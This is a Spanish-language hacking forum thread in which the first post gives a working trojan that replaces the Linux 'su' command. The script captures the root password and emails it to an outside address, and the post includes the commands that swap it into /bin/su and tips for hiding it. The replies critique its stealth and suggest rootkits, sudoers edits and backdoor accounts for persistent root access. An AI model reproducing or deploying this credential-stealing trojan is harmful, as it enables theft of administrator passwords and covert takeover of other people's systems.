Troyanizando "su"

Iniciado por H@T, 11 Octubre 2011, 02:55 AM

0 Miembros y 1 Visitante están viendo este tema.

H@T

Creamos un archivo su.sh y colocamos lo siguiente dentro:

#!/bin/bash
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail morsa@mi-dominio.com.ar
echo
echo su: Authentication failure
stty -echonl echo


Damos permisos de ejecución:

# chmod a+x su.sh

Luego podemos reemplazarlo por el verdadero su:

# whereis su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su


Luego podemos convertir el script en bash a binario como en el siguiente enlace: http://www.redes-seguridad.com.ar/2011/06/convertir-un-script-en-bash-en-un.html

También podríamos agregar al final del script la invocación del verdadero su, para que no genere ninguna duda, o moverlo nuevamente.

Opiniones, sugerencias?
H@T
http://www.redes-seguridad.com.ar
redes-seguridad.blogspot.com/

adastra

Vale, pero parece más un script de "cracker"/"script kiddie"...
Un hacker no "rompe" el sistema o componentes del mismo, a lo mejor modificará las llamadas del sistema y demas, pero permitirá que sigan funcionando correctamente... por ejemplo en el caso del script, solamente adquiere la contraseña, la envia a un correo determinado y posteriormente, solo enseña un mensaje de "No te puedes autenticar"... este modelo tiene varios inconvenientes.

1. Facil, muy facil de detectar por cualquier anti-rootkit en linux o incluso de forma manual, simplemente inspeccionando el sistema.
2. Ningun usuario podra utilizar el comando "su" como lo hacia habitualmente, por ende, esto despertará las sospechas de un administrador medianamente listo.
3. Si un administrador se enterá del "engaño" intentará detectar el mecanismo de acceso a la maquina e intentará bloquearlo, ademas de cambiar contraseñas y demas, lo que te dejará fuera del sistema...

Una de las principales caracteristicas de un hacker es que intentará hacer las cosas del modo más "sigiloso" posible, sin tratar de despertar sospechas, ademas de que tambien se preocupará por garantizar futuros accesos al sistema sin ser detectado...

No se... esto me suena a script kiddie...

Foxy Rider

#2
@Hat → Mirá, este método que planteás no está bueno por que depende que el comando mail esté funcionando y además es demasiado evidente ... si alguien trata de hacerse root y vé esto seguido, dalo por seguro que van a investigar el problema .. eso si no se dio cuenta mirando un su.orig cuando le daba al TAB y el autocompletado no te delató
Ir a cosas como rootkits, agregarte a sudoers o algún otro usuario que te haga de puertita a root sirve (pro y contras de por medio) ... pero para todas tenés que rootearte primero, inclusive para modificar syscalls (que, IMHO es lisa y llanamente un overkill ... es lo más al pedo que escuché)

Saludos.